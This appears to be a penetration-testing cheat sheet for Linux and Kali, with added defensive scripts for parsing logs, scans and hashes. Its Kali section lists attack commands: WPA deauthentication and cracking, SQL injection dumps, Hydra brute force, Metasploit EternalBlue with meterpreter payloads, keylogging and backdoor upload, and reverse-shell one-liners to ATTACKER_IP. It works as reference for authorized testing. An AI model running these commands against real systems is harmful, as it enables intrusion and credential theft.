This is the reference you keep open in a second terminal. Not a tutorial. Not a walkthrough. Just the commands you actually need, organized so you can find them in five seconds.
The first half covers Linux fundamentals that work on any distro. The second half is Kali-specific: reconnaissance, exploitation, wireless, web testing, and password cracking. Bookmark it. Print it. Tape it to your wall. Whatever works.
"The best hackers don't memorize commands. They memorize patterns and know exactly where to look up the syntax."
Filesystem Navigation
The terminal is your home now. These commands are muscle memory or they're slowing you down.
```bash
pwd                        # Where am I?
ls -la                     # List everything, permissions included
ls -lah                    # Same but human-readable file sizes
cd /etc                    # Go to absolute path
cd ..                      # Up one directory
cd ~                       # Home directory
cd -                       # Back to previous directory

tree -L 2                  # Visual directory tree, 2 levels deep
find / -name "*.conf"      # Find files by name (recursive from /)
locate secret.txt          # Fast search (uses database, run updatedb first)
which nmap                 # Where is this binary?
file mystery.bin           # What type of file is this?
```
Key Directories
| Path | What Lives Here |
|---|---|
| /etc | System configuration files |
| /var/log | Log files (goldmine for forensics) |
| /tmp | Temporary files (cleared on reboot) |
| /opt | Optional/third-party software |
| /usr/bin | User binaries (most commands) |
| /usr/share | Shared data (wordlists live here on Kali) |
| /home | User home directories |
| /root | Root user's home |
| /proc | Virtual filesystem for running processes |
| /dev | Device files |
File Operations
```bash
cp file.txt /tmp/                  # Copy file
cp -r folder/ /tmp/                # Copy directory recursively
mv old.txt new.txt                 # Rename or move
rm file.txt                        # Delete file (no confirmation)
rm -rf folder/                     # Delete directory and everything in it
mkdir -p path/to/new/dir           # Create nested directories
touch newfile.txt                  # Create empty file or update timestamp

cat file.txt                       # Print entire file
head -20 file.txt                  # First 20 lines
tail -f /var/log/syslog            # Follow log in real time
less file.txt                      # Scroll through file (q to quit)
wc -l file.txt                     # Count lines
diff file1.txt file2.txt           # Compare two files

tar czf archive.tar.gz folder/     # Compress directory
tar xzf archive.tar.gz             # Extract archive
zip -r archive.zip folder/         # Create zip
unzip archive.zip                  # Extract zip
```
Text Processing and Search
These commands turn raw output into usable intel. Chain them with pipes.
```bash
grep "password" file.txt                   # Search for string in file
grep -ri "password" /etc/                  # Recursive, case-insensitive
grep -v "noise" results.txt                # Invert match (exclude lines)
grep -c "error" /var/log/syslog            # Count matches
grep -E "user|pass|key" dump.txt           # Multiple patterns (regex)

cut -d':' -f1 /etc/passwd                  # Extract first field (usernames)
awk '{print $1}' access.log                # Print first column
sed 's/old/new/g' file.txt                 # Find and replace
sort file.txt | uniq -c | sort -rn         # Frequency count, most common first
tr 'A-Z' 'a-z' < FILE                      # Convert to lowercase

# The pipe chain that solves everything:
cat dump.txt | grep "192.168" | cut -d' ' -f3 | sort -u
```
Pipe Everything
The real power isn't in any single command. It's in chaining them. cat | grep | cut | sort | uniq will extract exactly what you need from almost any text output. Learn piping and you'll never feel stuck staring at a wall of terminal output again.
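An added example (not from the original page) of that exact chain on the defender's side of the fence: counting which source addresses are generating failed SSH logins. The log lines are constructed for the demo and use documentation address ranges; the functions read stdin, so the same pipeline works on a real tail of /var/log/auth.log. It relies on grep -o, which GNU and BSD grep both provide.

```bash
#!/bin/bash
# Added example: grep | cut | sort | uniq -c | sort -rn applied to sshd log lines.
# The log sample below is constructed for this demo (TEST-NET addresses), not a real capture.
SAMPLE_AUTH_LOG='Mar  3 10:01:02 host sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar  3 10:01:05 host sshd[1202]: Failed password for root from 203.0.113.5 port 51240 ssh2
Mar  3 10:01:09 host sshd[1203]: Accepted publickey for alice from 198.51.100.7 port 40110 ssh2
Mar  3 10:02:11 host sshd[1204]: Failed password for invalid user test from 198.51.100.9 port 51300 ssh2
Mar  3 10:02:15 host sshd[1205]: Failed password for root from 203.0.113.5 port 51250 ssh2'

# Reads log lines on stdin, prints "count ip" for every source of failed
# password attempts, busiest first. Each stage does one job:
#   grep            keeps only the failed-password events
#   grep -o / cut   isolate the address that follows "from"
#   sort | uniq -c  collapse duplicates into a count
#   sort -rn        busiest source first
#   awk             normalise uniq's padded output to "count ip"
failed_login_sources() {
  grep 'Failed password' \
    | grep -o 'from [0-9.]*' \
    | cut -d' ' -f2 \
    | sort \
    | uniq -c \
    | sort -rn \
    | awk '{print $1, $2}'
}

# Same pipeline with a threshold: only sources at or above $1 attempts,
# which is the shape of a first-pass brute-force detection rule.
noisy_sources() {
  failed_login_sources | awk -v threshold="$1" '$1 >= threshold {print $2}'
}

# Stand-alone run against the constructed sample:
printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_login_sources
printf '%s\n' "$SAMPLE_AUTH_LOG" | noisy_sources 2
```

On the sample this prints 203.0.113.5 with three failures and 198.51.100.9 with one; the successful publickey login never enters the count because the first grep drops it. Swapping the sample for `tail -n 1000 /var/log/auth.log` is the only change needed on a real host.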
Users, Permissions, and Ownership
```bash
whoami                           # Current user
id                               # User ID, group memberships
sudo su                          # Switch to root shell
sudo -l                          # What can I sudo?
passwd                           # Change your password

useradd -m newuser               # Create user with home directory
usermod -aG sudo newuser         # Add user to sudo group
userdel -r olduser               # Delete user and home directory

chmod 755 script.sh              # rwxr-xr-x
chmod +x script.sh               # Make executable
chmod 600 secret.txt             # Owner read/write only
chown user:group file.txt        # Change ownership
```
Permission Numbers Decoded
| Number | Permission | Meaning |
|---|---|---|
| 7 | rwx | Read + Write + Execute |
| 6 | rw- | Read + Write |
| 5 | r-x | Read + Execute |
| 4 | r-- | Read only |
| 0 | --- | Nothing |
Three digits: owner / group / everyone. So chmod 750 means owner gets full access, group gets read and execute, everyone else gets nothing.
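An added example (not part of the original page) that does the decoding from the table in code and then applies it to a real file. Besides turning 750 into rwxr-x---, it reports the bits a permissions review cares about: setuid, setgid and world-writable, which is exactly what the three-digit view hides when a mode has a fourth leading digit such as 4755. The file check assumes GNU stat (Linux).

```bash
#!/bin/bash
# Added example: decode an octal mode the way the table above does, and flag
# the bits that matter in a permissions review. Assumes GNU stat (Linux).

# One octal digit -> its rwx triplet.
digit_to_rwx() {
  case "$1" in
    7) printf '%s' 'rwx' ;;  6) printf '%s' 'rw-' ;;  5) printf '%s' 'r-x' ;;  4) printf '%s' 'r--' ;;
    3) printf '%s' '-wx' ;;  2) printf '%s' '-w-' ;;  1) printf '%s' '--x' ;;  0) printf '%s' '---' ;;
    *) return 1 ;;
  esac
}

# Three- or four-digit mode -> owner/group/other string, e.g. 750 -> rwxr-x---.
# A leading fourth digit (setuid/setgid/sticky) is dropped here and reported
# separately by mode_flags.
mode_to_rwx() {
  m="$1"
  m="${m#"${m%???}"}"              # keep only the last three digits
  o=$(digit_to_rwx "$(printf '%s' "$m" | cut -c1)") || return 1
  g=$(digit_to_rwx "$(printf '%s' "$m" | cut -c2)") || return 1
  w=$(digit_to_rwx "$(printf '%s' "$m" | cut -c3)") || return 1
  printf '%s%s%s\n' "$o" "$g" "$w"
}

# Prints the review-relevant bits of a mode as a comma-separated list:
# setuid, setgid, world-writable. Empty output means nothing to flag.
mode_flags() {
  bits=$((0$1))                    # leading 0 makes the shell parse it as octal
  out=""
  [ $((bits & 04000)) -ne 0 ] && out="${out}setuid,"
  [ $((bits & 02000)) -ne 0 ] && out="${out}setgid,"
  [ $((bits & 0002)) -ne 0 ] && out="${out}world-writable,"
  printf '%s\n' "${out%,}"
}

# Applies both to a real file: "path mode rwx flags" ("none" when nothing is flagged).
describe_file_mode() {
  mode=$(stat -c '%a' "$1") || return 1
  flags=$(mode_flags "$mode")
  printf '%s %s %s %s\n' "$1" "$mode" "$(mode_to_rwx "$mode")" "${flags:-none}"
}

# Stand-alone demo on a throwaway file.
demo_dir=$(mktemp -d)
touch "$demo_dir/app.sh"
chmod 4755 "$demo_dir/app.sh"
describe_file_mode "$demo_dir/app.sh"    # prints: <path>/app.sh 4755 rwxr-xr-x setuid
rm -r "$demo_dir"
```

The arithmetic in mode_flags is the point: the shell reads 04755 as octal, so masking with 04000, 02000 and 0002 tests the setuid, setgid and other-write bits directly instead of string-matching digits. Feed it `find / -perm -4000 -type f 2>/dev/null | while read -r f; do describe_file_mode "$f"; done` and you have a readable SUID inventory to diff against a known-good baseline.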
Process Management
```bash
ps aux                           # All running processes
ps aux | grep nmap               # Find specific process
top                              # Live process monitor
htop                             # Better live monitor (if installed)

kill 1234                        # Send SIGTERM to PID 1234
kill -9 1234                     # Force kill (SIGKILL)
killall firefox                  # Kill all processes by name
pkill -f "python server"         # Kill by pattern match

jobs                             # List background jobs
bg                               # Resume job in background
fg                               # Bring job to foreground
nohup ./long-task.sh &           # Run and survive terminal close

screen -S mysession              # Start named screen session
screen -r mysession              # Reattach to session
tmux new -s work                 # Start named tmux session
tmux attach -t work              # Reattach to tmux session
```
Networking Fundamentals
```bash
ip a                                     # All interfaces and IPs
ip route                                 # Routing table
ss -tlnp                                 # Listening TCP ports with PIDs
ss -ulnp                                 # Listening UDP ports

ping -c 4 target.com                     # 4 pings
traceroute target.com                    # Trace route to target
dig target.com                           # DNS lookup
dig @8.8.8.8 target.com ANY              # Full DNS query against Google (many servers now refuse ANY; ask for MX, TXT, NS individually if so)
nslookup target.com                      # Simple DNS lookup
host target.com                          # Another DNS tool
whois target.com                         # Domain registration info

curl -I https://target.com               # HTTP headers only
curl -s https://target.com               # Silent output (for piping)
wget https://target.com/file.zip         # Download file
wget -r -l 2 https://target.com          # Recursive download, 2 levels

# Transfer files between machines
python3 -m http.server 8080              # Quick HTTP server (current dir)
scp file.txt user@host:/path/            # Secure copy over SSH
rsync -avz folder/ user@host:/path/      # Sync directory over SSH
```
Package Management (Debian/Kali)
```bash
apt update                       # Refresh package lists
apt upgrade                      # Upgrade installed packages
apt install nmap                 # Install package
apt remove nmap                  # Remove package (keep config)
apt purge nmap                   # Remove package and config
apt search "wireless"            # Search for packages
apt list --installed             # List all installed packages
dpkg -l | grep nmap              # Check if specific package installed
dpkg -i package.deb              # Install local .deb file
```
Service Management (systemd)
```bash
systemctl status ssh                     # Check service status
systemctl start ssh                      # Start service
systemctl stop ssh                       # Stop service
systemctl restart ssh                    # Restart service
systemctl enable ssh                     # Start on boot
systemctl disable ssh                    # Don't start on boot
systemctl list-units --type=service      # List all services
journalctl -u ssh -f                     # Follow service logs
```
SSH
```bash
ssh user@target                          # Connect
ssh -p 2222 user@target                  # Connect on custom port
ssh -L 8080:localhost:80 user@target     # Local port forward
ssh -D 9050 user@target                  # SOCKS proxy through target
ssh -i key.pem user@target               # Connect with private key

ssh-keygen -t ed25519                    # Generate key pair (modern)
ssh-copy-id user@target                  # Install your public key on remote
```
Kali Arsenal
Everything above works on any Linux box. Everything below is why you boot Kali.
Legal Warning
Every tool in this section can land you in federal prison if used without authorization. Penetration testing requires explicit written permission from the system owner. "I was just learning" is not a legal defense. Lab environments, CTF competitions, and your own hardware are fair game. Everything else requires a signed contract.
Nmap (Network Reconnaissance)
The single most important tool in the arsenal. If you learn one thing on this page, learn nmap.
Discovery and Host Scanning
```bash
nmap -sn 192.168.1.0/24          # Ping sweep (find live hosts)
nmap -sn -PR 192.168.1.0/24      # ARP ping (local network only)
nmap target.com                  # Default scan (top 1000 TCP ports)
nmap -p- target.com              # All 65535 TCP ports
nmap -p 80,443,8080 target.com   # Specific ports
nmap -p 1-1000 target.com        # Port range
```
Service and OS Detection
```bash
nmap -sV target.com                              # Service version detection
nmap -sV --version-intensity 5 target.com        # Aggressive version scan
nmap -O target.com                               # OS detection
nmap -A target.com                               # Aggressive: OS + version + scripts + traceroute
```
Scan Types
```bash
nmap -sS target.com              # SYN scan (stealth, default with root)
nmap -sT target.com              # TCP connect scan (no root needed)
nmap -sU target.com              # UDP scan (slow but important)
nmap -sS -sU target.com          # TCP and UDP combined
nmap -sN target.com              # NULL scan (firewall evasion)
nmap -sF target.com              # FIN scan (firewall evasion)
```
NSE Scripts
```bash
nmap --script=default target.com             # Default script suite
nmap --script=vuln target.com                # Vulnerability detection scripts
nmap --script=http-enum target.com           # Web directory enumeration
nmap --script=smb-vuln* target.com           # SMB vulnerability checks
nmap --script=ssl-heartbleed target.com      # Heartbleed check
nmap --script-help=http-enum                 # Script documentation

# The "give me everything" scan:
nmap -sS -sV -O -A --script=default,vuln -p- -oA full_scan target.com
```
Output Formats
```bash
nmap -oN scan.txt target.com             # Normal output
nmap -oX scan.xml target.com             # XML output
nmap -oG scan.gnmap target.com           # Grepable output
nmap -oA scan_results target.com         # All three formats at once
```
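The grepable format exists so the scan can be post-processed with the same tools as the text section above. As an added example (not from the original page), here is a small parser for -oG output that emits one line per open port and then answers the inventory question a defender asks of a scan of their own network: which hosts expose a given port. The scan text is constructed for the demo; the hostnames, versions and addresses are illustrative, and the port-field layout (port/state/protocol/owner/service/rpcinfo/version/) is nmap's documented -oG layout.

```bash
#!/bin/bash
# Added example: parse nmap -oG output with awk. The scan below is a constructed
# sample in nmap's grepable layout, not output from a real scan.
SAMPLE_GNMAP=$(printf '%b\n' \
  '# Nmap 7.94 scan initiated Wed Mar  6 10:00:00 2024 as: nmap -sV -oG scan.gnmap 192.168.56.0/24' \
  'Host: 192.168.56.10 ()\tStatus: Up' \
  'Host: 192.168.56.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, 3306/filtered/tcp//mysql///\tIgnored State: closed (997)' \
  'Host: 192.168.56.20 (db.lab.test)\tStatus: Up' \
  'Host: 192.168.56.20 (db.lab.test)\tPorts: 5432/open/tcp//postgresql//PostgreSQL DB 9.6.0 or later/\tIgnored State: closed (999)' \
  '# Nmap done at Wed Mar  6 10:00:42 2024 -- 256 IP addresses (2 hosts up) scanned in 42.10 seconds')

# Reads -oG text on stdin and prints "host port/proto service version" for
# every open port. Fields on a Host line are tab-separated; the Ports field
# holds comma-separated entries of the form
#   port/state/protocol/owner/service/rpcinfo/version/
open_ports() {
  awk -F'\t' '
    /^Host:/ && /\tPorts: / {
      host = $1
      sub(/^Host: /, "", host)         # strip the label
      sub(/ .*/, "", host)             # drop the " (hostname)" part
      ports = ""
      for (i = 2; i <= NF; i++)
        if ($i ~ /^Ports: /) ports = substr($i, 8)
      n = split(ports, entry, ", ")
      for (j = 1; j <= n; j++) {
        split(entry[j], f, "/")
        if (f[2] == "open")
          printf "%s %s/%s %s %s\n", host, f[1], f[3], f[5], f[7]
      }
    }'
}

# Hosts that have port $1 open, e.g. hosts_with_port 5432.
hosts_with_port() {
  open_ports | awk -v p="$1" '$2 ~ ("^" p "/") {print $1}' | sort -u
}

# Stand-alone run against the constructed sample:
printf '%s\n' "$SAMPLE_GNMAP" | open_ports
printf '%s\n' "$SAMPLE_GNMAP" | hosts_with_port 5432
```

Only entries whose state field is literally open are reported, so the filtered 3306 in the sample is silently dropped; change the comparison if you also want to see filtered ports. With a real file the usage is `open_ports < scan.gnmap`, and `hosts_with_port 3389 < scan.gnmap` is a one-line "who is exposing RDP" check to run after every inventory scan.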
Web Application Testing
Gobuster (Directory and DNS Brute Force)
```bash
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
gobuster dir -u http://target.com -w wordlist.txt -x php,html,txt        # File extensions
gobuster dir -u http://target.com -w wordlist.txt -t 50 -o results.txt   # 50 threads, save output
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```
Nikto (Web Vulnerability Scanner)
```bash
nikto -h http://target.com                               # Basic scan
nikto -h http://target.com -p 8080                       # Custom port
nikto -h http://target.com -o report.html -Format htm    # HTML report
nikto -h http://target.com -Tuning 9                     # Test for SQL injection
```
SQLMap (SQL Injection)
```bash
sqlmap -u "http://target.com/page?id=1"                              # Test URL parameter
sqlmap -u "http://target.com/page?id=1" --dbs                        # Enumerate databases
sqlmap -u "http://target.com/page?id=1" -D dbname --tables           # List tables
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump    # Dump table
sqlmap -u "http://target.com/page?id=1" --os-shell                   # OS shell (if possible)
sqlmap -r request.txt                                                # Test from saved Burp request
```
WhatWeb and curl Recon
```bash
whatweb target.com                                             # Technology fingerprint
whatweb -v target.com                                          # Verbose output
curl -s -o /dev/null -w "%{http_code}" http://target.com       # Just the status code
curl -s http://target.com | grep -i "powered by"               # CMS detection
```
Wireless Attacks (aircrack-ng Suite)
Monitor Mode and Capture
```bash
airmon-ng                        # List wireless interfaces
airmon-ng start wlan0            # Enable monitor mode
airmon-ng stop wlan0mon          # Disable monitor mode

airodump-ng wlan0mon             # Scan all nearby networks
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# ^ Target specific network on channel 6, save to capture files
```
Deauthentication and Handshake Capture
```bash
# Force client disconnect to capture WPA handshake:
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# -0 = deauth, 5 = number of packets, -a = target AP BSSID

# Wait for handshake in airodump-ng output, then crack:
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
```
Full WPA Cracking Workflow
```bash
# 1. Start monitor mode
airmon-ng start wlan0

# 2. Scan for targets
airodump-ng wlan0mon

# 3. Target specific AP and capture
airodump-ng -c [channel] --bssid [BSSID] -w capture wlan0mon

# 4. Deauth a client (in second terminal)
aireplay-ng -0 10 -a [BSSID] -c [CLIENT_MAC] wlan0mon

# 5. Crack the captured handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
```
Password Cracking
John the Ripper
```bash
john hashfile.txt                                          # Auto-detect hash and crack
john --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
john --show hashfile.txt                                   # Show cracked passwords
john --format=raw-sha256 hashfile.txt                      # Specify hash format

# Crack /etc/shadow:
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt
```
Hashcat (GPU-Accelerated)
```bash
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt   # MD5
hashcat -m 1000 hashes.txt wordlist.txt                    # NTLM
hashcat -m 1800 hashes.txt wordlist.txt                    # SHA-512 (Linux shadow)
hashcat -m 2500 capture.hccapx wordlist.txt                # WPA/WPA2 (legacy mode; current hashcat uses -m 22000 with a .hc22000 file)

# Rule-based attack (much more effective than straight wordlist):
hashcat -m 0 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
```
Hydra (Online Brute Force)
```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com ssh
hydra -l admin -P passwords.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
hydra -L users.txt -P passwords.txt target.com ftp
hydra -l admin -P passwords.txt rdp://target.com
```
Metasploit Framework
Core Commands
```text
msfconsole                                          # Launch Metasploit
search eternalblue                                  # Find exploit modules
use exploit/windows/smb/ms17_010_eternalblue        # Select module
show options                                        # View required settings
set RHOSTS target.com                               # Set target
set LHOST your.ip                                   # Set listener IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp     # Set payload
exploit                                             # Launch
```
Meterpreter Commands (Post-Exploitation)
```text
sysinfo                                  # System information
getuid                                   # Current user
getsystem                                # Attempt privilege escalation
hashdump                                 # Dump password hashes
screenshot                               # Capture screen
keyscan_start                            # Start keylogger
keyscan_dump                             # Dump keystrokes
download C:\\secret.txt                  # Download file from target
upload backdoor.exe C:\\                 # Upload file to target
shell                                    # Drop to system shell
portfwd add -l 3389 -p 3389 -r target    # Port forward
```
Listener Setup
```text
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j                               # Run as background job
```
Privilege Escalation Recon
When you land on a box, these are the first things to check.
Linux Privilege Escalation
```bash
whoami && id                                     # Who are you?
sudo -l                                          # What can you sudo?
cat /etc/crontab                                 # Scheduled tasks
ls -la /etc/cron*                                # All cron directories
find / -perm -4000 -type f 2>/dev/null           # SUID binaries (gold)
find / -writable -type f 2>/dev/null             # World-writable files
cat /etc/passwd                                  # All users
ls -la /home/                                    # Home directories
env                                              # Environment variables
cat /proc/version                                # Kernel version
uname -a                                         # System info
netstat -tlnp                                    # Internal services
```
Windows Privilege Escalation
```bat
whoami /priv                                     :: Check privileges
net user                                         :: List users
net localgroup administrators                    :: Admin group members
systeminfo                                       :: Full system info
tasklist /svc                                    :: Running services
netstat -ano                                     :: Network connections
reg query HKLM /f password /t REG_SZ /s          :: Search registry for passwords
```
Wordlists and Payloads
Kali Default Locations
```text
/usr/share/wordlists/                    # Main wordlist directory
/usr/share/wordlists/rockyou.txt         # The classic (14M passwords)
/usr/share/wordlists/dirb/               # Web directory wordlists
/usr/share/wordlists/dirbuster/          # More web directories
/usr/share/seclists/                     # SecLists collection (install: apt install seclists)
/usr/share/nmap/scripts/                 # NSE scripts
/usr/share/webshells/                    # Pre-built web shells
/usr/share/exploitdb/                    # Local exploit database
```
Generating Custom Wordlists
```bash
# Crunch (pattern-based):
crunch 8 8 -t @@@@2024 -o wordlist.txt           # 4 lowercase + "2024"
crunch 6 8 0123456789 -o numeric.txt             # 6-8 digit numbers

# CeWL (scrape website for words):
cewl https://target.com -d 2 -m 5 -w wordlist.txt
# -d = depth, -m = min word length

# Combine and deduplicate:
cat list1.txt list2.txt | sort -u > combined.txt
```
Quick Reference Tables
Common Port Numbers
| Port | Service | Notes |
|---|---|---|
| 21 | FTP | File transfer (often anonymous) |
| 22 | SSH | Secure shell |
| 23 | Telnet | Cleartext remote access (legacy) |
| 25 | SMTP | Email sending |
| 53 | DNS | Domain resolution |
| 80 | HTTP | Web traffic |
| 110 | POP3 | Email retrieval |
| 135 | MSRPC | Windows RPC |
| 139 | NetBIOS | Windows networking |
| 143 | IMAP | Email access |
| 443 | HTTPS | Encrypted web traffic |
| 445 | SMB | Windows file sharing |
| 993 | IMAPS | Encrypted IMAP |
| 1433 | MSSQL | Microsoft SQL Server |
| 3306 | MySQL | MySQL database |
| 3389 | RDP | Remote Desktop |
| 5432 | PostgreSQL | PostgreSQL database |
| 5900 | VNC | Virtual desktop |
| 6379 | Redis | In-memory database |
| 8080 | HTTP-Alt | Common alternate web port |
| 8443 | HTTPS-Alt | Common alternate HTTPS |
Hash Identification
| Hash Pattern | Type | Hashcat Mode |
|---|---|---|
| 32 hex chars | MD5 | -m 0 |
| 40 hex chars | SHA-1 | -m 100 |
| 64 hex chars | SHA-256 | -m 1400 |
| 128 hex chars | SHA-512 | -m 1700 |
| $1$ prefix | MD5crypt | -m 500 |
| $5$ prefix | SHA-256crypt | -m 7400 |
| $6$ prefix | SHA-512crypt (Linux) | -m 1800 |
| $2b$ prefix | bcrypt | -m 3200 |
| 32 hex chars (no salt) | NTLM | -m 1000 |
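An added example (not from the original page) that turns the table into a function and makes its two hidden caveats explicit: a 32-hex-character value is MD5 or NTLM and only the source tells you which, and bcrypt strings also appear with the $2a$ and $2y$ prefixes, all of which hashcat handles under -m 3200. The second function is the triage view you want when a credential file turns up in an incident: how much of it is unsalted fast hashes versus crypt and bcrypt. The sample values are constructed: the first three are MD5, SHA-1 and NTLM of the string "password", the crypt entries are placeholders.

```bash
#!/bin/bash
# Added example: classify a hash string by prefix or length, per the table above,
# and summarise a whole file of them. Prints "type hashcat-mode", or "unknown"
# with a non-zero exit status.
identify_hash() {
  h="$1"
  case "$h" in
    '$1$'*)                   printf 'MD5crypt -m 500\n';      return 0 ;;
    '$5$'*)                   printf 'SHA-256crypt -m 7400\n'; return 0 ;;
    '$6$'*)                   printf 'SHA-512crypt -m 1800\n'; return 0 ;;
    '$2a$'*|'$2b$'*|'$2y$'*)  printf 'bcrypt -m 3200\n';       return 0 ;;
  esac
  # Everything else in the table is a bare hex digest, classified by length.
  case "$h" in
    ''|*[!0-9A-Fa-f]*) printf 'unknown\n'; return 1 ;;
  esac
  case "${#h}" in
    32)  printf 'MD5-or-NTLM -m 0 -m 1000\n' ;;   # same length and charset; the source decides
    40)  printf 'SHA-1 -m 100\n' ;;
    64)  printf 'SHA-256 -m 1400\n' ;;
    128) printf 'SHA-512 -m 1700\n' ;;
    *)   printf 'unknown\n'; return 1 ;;
  esac
}

# Reads one hash per line on stdin, prints "count type", most common first.
hash_type_summary() {
  while IFS= read -r line; do
    [ -n "$line" ] && identify_hash "$line" | cut -d' ' -f1
  done | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# Constructed sample: MD5, SHA-1 and NTLM of "password", then placeholder
# crypt strings (not real credentials) and one line that is not a hash at all.
SAMPLE_HASHES='5f4dcc3b5aa765d61d8327deb882cf99
5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
8846f7eaee8fb117ad06bdd830b7586c
$6$saltsalt$PLACEHOLDERxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
$2b$12$PLACEHOLDERxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
not-a-hash'

# Stand-alone run against the constructed sample:
identify_hash 5f4dcc3b5aa765d61d8327deb882cf99
printf '%s\n' "$SAMPLE_HASHES" | hash_type_summary
```

Real usage is `hash_type_summary < dump.txt`. A file that is mostly MD5-or-NTLM or SHA-1 is the bad case for the owner of those accounts: those are the modes at the top of the table precisely because a wordlist run against them finishes in minutes, whereas the crypt and bcrypt rows are the slow, salted formats a password store should be using.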
One-Liners That Save the Day
```bash
# Reverse shell (attacker listener):
nc -lvnp 4444

# Reverse shell (target, bash):
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Reverse shell (target, python):
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Upgrade dumb shell to interactive:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z, then:
stty raw -echo; fg
# Then: export TERM=xterm

# Quick web server for file transfer:
python3 -m http.server 8080

# Base64 encode/decode:
echo "secret" | base64
echo "c2VjcmV0Cg==" | base64 -d

# Check if you can reach the internet:
curl -s ifconfig.me

# Find recently modified files (last 10 minutes):
find / -mmin -10 -type f 2>/dev/null

# Hex dump a binary:
xxd suspicious.bin | head -50
```
The Methodology
Tools don't matter without a process. Here's the pattern that works:
- Reconnaissance: nmap, whois, dig, theHarvester. Map the target before you touch it.
- Enumeration: Service versions, directories, usernames, shares. Dig deeper into what recon found.
- Vulnerability Assessment: searchsploit, nmap scripts, nikto. Match findings to known weaknesses.
- Exploitation: Metasploit, manual exploits, password attacks. Gain initial access.
- Post-Exploitation: Privilege escalation, persistence, lateral movement. Expand access.
- Documentation: Screenshots, logs, timestamps. If you didn't document it, it didn't happen.
"Amateurs hack systems. Professionals hack people, processes, and then systems, in that order."
This page covers the commands. The Hacker's Path series covers the thinking. If you want to understand why these tools work the way they do, start there. If you just need the syntax right now, you're already in the right place.